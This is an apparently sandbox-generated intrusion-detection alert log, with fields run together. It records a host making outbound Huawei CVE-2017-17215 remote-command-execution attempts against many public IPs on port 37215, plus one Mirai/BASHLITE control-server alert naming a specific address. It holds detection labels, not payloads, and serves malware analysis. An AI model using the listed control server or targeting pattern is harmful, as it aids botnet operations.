                                                        06/13/24-21:32:07.417065TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5335837215192.168.2.1441.170.93.165
                                                        06/13/24-21:32:07.416687TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5088037215192.168.2.14197.240.25.240
                                                        06/13/24-21:32:34.199971TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5761037215192.168.2.14197.229.17.50
                                                        06/13/24-21:32:09.440516TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6028637215192.168.2.14197.33.83.216
                                                        06/13/24-21:32:01.222842TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5018437215192.168.2.14197.121.144.19
                                                        06/13/24-21:33:02.936119TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4017237215192.168.2.14197.119.241.144
                                                        06/13/24-21:33:00.887769TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3381037215192.168.2.14197.242.113.4
                                                        06/13/24-21:32:28.043736TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3627837215192.168.2.1441.147.128.207
                                                        06/13/24-21:32:48.551851TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3960837215192.168.2.14197.34.62.25
                                                        06/13/24-21:32:25.975464TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4665437215192.168.2.1441.213.225.174
                                                        06/13/24-21:32:40.358268TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3277037215192.168.2.14197.67.244.85
                                                        06/13/24-21:33:00.869622TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3938437215192.168.2.14197.84.196.34
                                                        06/13/24-21:33:13.214380TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5523237215192.168.2.14197.108.145.170
                                                        06/13/24-21:32:58.839693TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3589437215192.168.2.1441.60.23.65
                                                        06/13/24-21:32:48.569495TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5417037215192.168.2.14156.245.163.139
                                                        06/13/24-21:31:59.196326TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6067437215192.168.2.1441.78.199.140
                                                        06/13/24-21:32:07.404235TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5861437215192.168.2.1441.103.130.201
                                                        06/13/24-21:32:38.297298TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5398037215192.168.2.1441.114.146.203
                                                        06/13/24-21:33:09.089163TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6069637215192.168.2.1441.74.222.119
                                                        06/13/24-21:32:11.486818TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3956637215192.168.2.14156.159.202.147
                                                        06/13/24-21:32:11.485638TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3412237215192.168.2.14156.40.152.52
                                                        06/13/24-21:32:13.564239TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5975237215192.168.2.14197.151.47.114
                                                        06/13/24-21:32:09.457389TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3448037215192.168.2.14156.30.191.126
                                                        06/13/24-21:33:13.211991TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4984637215192.168.2.1441.54.151.210
                                                        06/13/24-21:32:19.729446TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5007437215192.168.2.1441.155.232.128
                                                        06/13/24-21:32:34.212474TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4807237215192.168.2.14197.51.202.245
                                                        06/13/24-21:32:34.196832TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4882637215192.168.2.1441.77.61.16
                                                        06/13/24-21:32:13.569313TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4181437215192.168.2.14156.164.161.4
                                                        06/13/24-21:32:48.552930TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5453437215192.168.2.14197.204.166.69
                                                        06/13/24-21:33:15.276120TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4250837215192.168.2.14156.40.121.145
                                                        06/13/24-21:32:19.729011TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5631237215192.168.2.1441.109.140.218
                                                        06/13/24-21:32:52.658463TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5516237215192.168.2.14197.98.171.242
                                                        06/13/24-21:32:36.244795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4599437215192.168.2.1441.129.151.102
                                                        06/13/24-21:32:42.409389TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5392037215192.168.2.14156.163.62.41
                                                        06/13/24-21:33:11.159433TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4718437215192.168.2.14197.250.246.82
                                                        06/13/24-21:33:05.016917TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5594637215192.168.2.14156.177.133.115
                                                        06/13/24-21:32:50.632749TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3669037215192.168.2.1441.169.48.109
                                                        06/13/24-21:32:52.669851TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5752437215192.168.2.14197.19.237.13
                                                        06/13/24-21:32:46.510109TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5351037215192.168.2.14197.110.144.128
                                                        06/13/24-21:33:02.912828TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3845837215192.168.2.14197.181.224.41
                                                        06/13/24-21:32:52.656357TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4513437215192.168.2.1441.211.76.79
                                                        06/13/24-21:32:19.729852TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4628437215192.168.2.14156.214.222.74
                                                        06/13/24-21:32:34.200207TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5286037215192.168.2.1441.66.14.253
                                                        06/13/24-21:32:09.440202TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3336837215192.168.2.14156.77.205.138
                                                        06/13/24-21:32:13.566239TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4854637215192.168.2.14156.73.238.39
                                                        06/13/24-21:32:52.658725TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5714837215192.168.2.14197.195.16.93
                                                        06/13/24-21:33:00.870407TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4759437215192.168.2.1441.202.171.129
                                                        06/13/24-21:31:59.196588TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3513237215192.168.2.14156.249.24.102
                                                        06/13/24-21:32:44.478554TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3878237215192.168.2.1441.2.204.161
                                                        06/13/24-21:32:03.299264TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4794237215192.168.2.14197.200.253.22
                                                        06/13/24-21:33:04.987385TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4851637215192.168.2.1441.105.250.45
                                                        06/13/24-21:32:11.485956TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5421037215192.168.2.14156.33.242.137
                                                        06/13/24-21:32:09.458123TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5636037215192.168.2.14156.65.0.167
                                                        06/13/24-21:32:34.199622TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3636437215192.168.2.14156.136.75.43
                                                        06/13/24-21:31:59.195696TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5306237215192.168.2.14197.251.142.134
                                                        06/13/24-21:32:17.672572TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4993637215192.168.2.14156.234.8.206
                                                        06/13/24-21:32:40.378017TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4872637215192.168.2.1441.83.150.39
                                                        06/13/24-21:31:57.090678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4420037215192.168.2.14197.158.27.73
                                                        06/13/24-21:32:58.838417TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3633237215192.168.2.14197.116.231.14
                                                        06/13/24-21:32:32.167713TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5140637215192.168.2.14197.12.179.9
                                                        06/13/24-21:33:15.274208TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3999837215192.168.2.1441.181.196.192
                                                        06/13/24-21:33:04.990606TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5862037215192.168.2.14156.82.25.150
                                                        06/13/24-21:32:01.223862TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4619837215192.168.2.14156.39.242.52
                                                        06/13/24-21:32:38.302542TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3989237215192.168.2.14156.170.128.197
                                                        06/13/24-21:32:40.357565TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3398237215192.168.2.14197.46.227.225
                                                        06/13/24-21:33:15.270996TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4012637215192.168.2.14197.57.62.154
                                                        06/13/24-21:32:58.819832TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5861237215192.168.2.14197.207.74.187
                                                        06/13/24-21:32:56.791704TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5317837215192.168.2.14156.184.37.117
                                                        06/13/24-21:31:59.176642TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4489437215192.168.2.14156.113.19.65
                                                        06/13/24-21:31:59.195259TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3974237215192.168.2.1441.32.17.23
                                                        06/13/24-21:32:17.675577TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5020637215192.168.2.14156.38.245.177
                                                        06/13/24-21:32:58.822239TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5129837215192.168.2.14156.52.151.179
                                                        06/13/24-21:31:59.177304TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4100637215192.168.2.14156.209.60.71
                                                        06/13/24-21:32:36.248633TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4125237215192.168.2.1441.22.134.81
                                                        06/13/24-21:32:21.784939TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6052037215192.168.2.1441.255.100.112
                                                        06/13/24-21:32:58.821508TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5829037215192.168.2.1441.25.138.22
                                                        06/13/24-21:32:32.166290TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3615437215192.168.2.14156.26.155.227
                                                        06/13/24-21:32:13.564576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5828437215192.168.2.14197.2.160.31
                                                        06/13/24-21:33:15.253478TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5009637215192.168.2.1441.244.106.104
                                                        06/13/24-21:32:50.614170TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4153237215192.168.2.1441.96.173.84
                                                        06/13/24-21:32:23.832882TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6056037215192.168.2.14197.249.122.40
                                                        06/13/24-21:32:17.671908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6052837215192.168.2.1441.74.60.247
                                                        06/13/24-21:32:01.238778TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3570437215192.168.2.1441.41.164.139
                                                        06/13/24-21:32:30.126647TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3773837215192.168.2.1441.130.25.95
                                                        06/13/24-21:33:02.909420TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5441037215192.168.2.1441.153.149.230
                                                        06/13/24-21:32:30.075094TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5896837215192.168.2.14197.106.251.218
                                                        06/13/24-21:32:34.199058TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4392237215192.168.2.14156.95.168.39
                                                        06/13/24-21:32:34.199691TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4235637215192.168.2.14156.236.164.19
                                                        06/13/24-21:32:38.298310TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5483437215192.168.2.1441.19.78.64
                                                        06/13/24-21:32:05.346569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5199037215192.168.2.14156.33.139.199
                                                        06/13/24-21:32:07.416242TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3311437215192.168.2.1441.89.230.241
                                                        06/13/24-21:32:17.695355TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4813237215192.168.2.14197.168.59.95
                                                        06/13/24-21:32:25.993953TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3470237215192.168.2.14156.64.117.254
                                                        06/13/24-21:32:38.320023TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4572637215192.168.2.14156.195.73.195
                                                        06/13/24-21:32:01.221809TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5519637215192.168.2.14156.53.90.107
                                                        06/13/24-21:33:02.935623TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3318837215192.168.2.1441.193.22.225
                                                        06/13/24-21:32:38.303695TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5223237215192.168.2.14197.218.230.216
                                                        06/13/24-21:32:42.422547TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4074437215192.168.2.14156.172.240.202
                                                        06/13/24-21:33:00.869128TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3744837215192.168.2.14197.90.88.15
                                                        06/13/24-21:32:28.048758TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4485037215192.168.2.14156.153.157.239
                                                        06/13/24-21:32:28.025516TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4511437215192.168.2.14156.114.211.55
                                                        06/13/24-21:32:03.277881TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5891637215192.168.2.14156.40.255.202
                                                        06/13/24-21:32:30.099712TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4543637215192.168.2.14197.16.132.110
                                                        06/13/24-21:33:11.172741TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3385237215192.168.2.1441.241.251.111
                                                        06/13/24-21:32:32.156467TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4898237215192.168.2.1441.181.136.251
                                                        06/13/24-21:32:30.077974TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4961437215192.168.2.14156.59.223.235
                                                        06/13/24-21:32:58.823053TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6028837215192.168.2.1441.41.28.93
                                                        06/13/24-21:32:15.632866TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5520837215192.168.2.14156.34.54.131
                                                        06/13/24-21:32:09.440884TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3438637215192.168.2.1441.213.235.87
                                                        06/13/24-21:32:56.756351TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4170837215192.168.2.14197.195.230.125
                                                        06/13/24-21:32:07.401290TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4195237215192.168.2.14156.54.33.198
                                                        06/13/24-21:32:23.833687TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4833237215192.168.2.1441.70.112.147
                                                        06/13/24-21:32:40.373238TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3431037215192.168.2.14197.70.48.201
                                                        06/13/24-21:32:48.555698TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4858237215192.168.2.14156.124.88.157
                                                        06/13/24-21:33:05.013558TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4166237215192.168.2.14156.104.147.175
                                                        06/13/24-21:32:05.377813TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4912837215192.168.2.14197.159.92.94
                                                        06/13/24-21:32:30.077205TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6077037215192.168.2.14197.11.186.131
                                                        06/13/24-21:33:02.912258TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3499037215192.168.2.1441.235.22.75
                                                        06/13/24-21:32:44.457601TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4981437215192.168.2.14197.191.50.136
                                                        06/13/24-21:32:32.155300TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5481837215192.168.2.1441.90.161.81
                                                        06/13/24-21:32:30.098873TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4863037215192.168.2.14197.11.243.82
                                                        06/13/24-21:32:13.546181TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5432837215192.168.2.14197.88.86.227
                                                        06/13/24-21:32:13.565173TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3521637215192.168.2.14197.213.77.184
                                                        06/13/24-21:33:05.017278TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3801437215192.168.2.1441.46.114.141
                                                        06/13/24-21:33:02.914159TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3921237215192.168.2.14197.61.190.141
                                                        06/13/24-21:32:25.975709TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5744437215192.168.2.1441.220.11.194
                                                        06/13/24-21:32:05.371112TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4737837215192.168.2.1441.101.23.157
                                                        06/13/24-21:33:09.110232TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5940037215192.168.2.14156.123.163.144
                                                        06/13/24-21:33:11.160571TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3793437215192.168.2.14197.231.169.191
                                                        06/13/24-21:32:03.279138TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5073037215192.168.2.1441.46.40.162
                                                        06/13/24-21:32:52.657624TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4864837215192.168.2.14156.82.215.182
                                                        06/13/24-21:33:09.087368TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3818437215192.168.2.14197.94.81.214
                                                        06/13/24-21:33:07.060258TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3811637215192.168.2.1441.67.151.85
                                                        06/13/24-21:32:09.440022TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4332837215192.168.2.14156.20.93.120
                                                        06/13/24-21:32:09.453514TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3482837215192.168.2.14197.59.67.49
                                                        06/13/24-21:32:05.344168TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5287437215192.168.2.14197.248.150.230
                                                        06/13/24-21:32:38.303649TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3554037215192.168.2.14156.11.233.202
                                                        06/13/24-21:32:48.555901TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5592237215192.168.2.14197.196.186.154
                                                        06/13/24-21:32:07.402430TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3563237215192.168.2.14156.91.26.206
                                                        06/13/24-21:32:17.677272TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5364037215192.168.2.1441.92.222.177
                                                        06/13/24-21:32:34.191532TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4179637215192.168.2.1441.220.96.119
                                                        06/13/24-21:32:28.025884TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5174237215192.168.2.1441.128.16.22
                                                        06/13/24-21:32:56.787911TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4165437215192.168.2.14197.129.224.198
                                                        06/13/24-21:33:02.914780TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5089437215192.168.2.1441.193.242.106
                                                        06/13/24-21:31:59.175914TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3692037215192.168.2.14197.175.159.181
                                                        06/13/24-21:33:04.989635TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3389237215192.168.2.14197.3.167.8
                                                        06/13/24-21:33:17.307561TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5517237215192.168.2.14197.104.108.205
                                                        06/13/24-21:32:13.568541TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5348037215192.168.2.1441.88.151.252
                                                        06/13/24-21:32:28.023729TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5747037215192.168.2.14156.228.3.140
                                                        06/13/24-21:32:58.819673TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3412237215192.168.2.14156.247.172.243
                                                        06/13/24-21:32:19.728689TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4937437215192.168.2.14156.42.12.110
                                                        06/13/24-21:33:13.227929TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4432637215192.168.2.14197.35.230.96
                                                        06/13/24-21:32:23.832965TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3940837215192.168.2.14156.103.62.207
                                                        06/13/24-21:32:11.486665TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6077637215192.168.2.14197.32.57.158
                                                        06/13/24-21:32:38.298698TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5027637215192.168.2.14197.169.136.48
                                                        06/13/24-21:32:48.555211TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4088437215192.168.2.1441.197.14.64
                                                        06/13/24-21:33:09.088237TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5074237215192.168.2.14197.170.199.65
                                                        06/13/24-21:32:11.506177TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3687437215192.168.2.14156.94.134.18
                                                        06/13/24-21:32:11.487487TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4077637215192.168.2.14197.98.75.3
                                                        06/13/24-21:32:25.970065TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5631637215192.168.2.14156.76.102.92
                                                        06/13/24-21:32:30.077024TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3960637215192.168.2.14197.99.8.173
                                                        06/13/24-21:31:57.091813TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4968637215192.168.2.14156.200.181.229
                                                        06/13/24-21:32:50.611281TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4249837215192.168.2.1441.1.29.22
                                                        06/13/24-21:32:21.805525TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4569437215192.168.2.1441.51.24.243
                                                        06/13/24-21:33:17.304952TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4256037215192.168.2.14156.237.213.152
                                                        06/13/24-21:32:07.417154TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3639037215192.168.2.14156.46.17.92
                                                        06/13/24-21:32:32.155881TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4741237215192.168.2.14156.9.89.52
                                                        06/13/24-21:32:56.758191TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5479637215192.168.2.14197.185.50.86
                                                        06/13/24-21:32:40.375417TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5364237215192.168.2.14197.110.201.231
                                                        06/13/24-21:32:46.502412TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4275237215192.168.2.14197.184.113.28
                                                        06/13/24-21:32:42.407388TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4368637215192.168.2.14156.9.20.170
                                                        06/13/24-21:32:42.420247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4135237215192.168.2.1441.165.212.80
                                                        06/13/24-21:32:44.529888TCP2840516ETPRO TROJAN ELF/BASHLITE/Mirai Cayosin Variant CnC Server Message455434096103.82.38.94192.168.2.14
                                                        06/13/24-21:32:07.420184TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5260837215192.168.2.1441.25.51.249
                                                        06/13/24-21:33:00.870796TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4893637215192.168.2.1441.219.20.226
                                                        06/13/24-21:31:59.197302TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3299437215192.168.2.14156.178.175.24
                                                        06/13/24-21:32:54.711691TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3706037215192.168.2.14197.132.244.196
                                                        06/13/24-21:32:13.564532TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5375037215192.168.2.14156.109.40.107
                                                        06/13/24-21:32:23.932430TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3610037215192.168.2.14197.22.191.182
                                                        06/13/24-21:32:11.488274TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3534637215192.168.2.14156.248.225.156
                                                        06/13/24-21:33:13.228210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4133437215192.168.2.1441.157.148.128
                                                        06/13/24-21:33:11.160187TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3762637215192.168.2.14197.200.200.87
                                                        06/13/24-21:33:07.040309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4838637215192.168.2.14156.191.214.58
                                                        06/13/24-21:33:09.128591TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4744037215192.168.2.14197.80.62.52
                                                        06/13/24-21:32:40.375107TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3436237215192.168.2.14156.194.240.66
                                                        06/13/24-21:32:50.613901TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3921637215192.168.2.1441.53.7.192
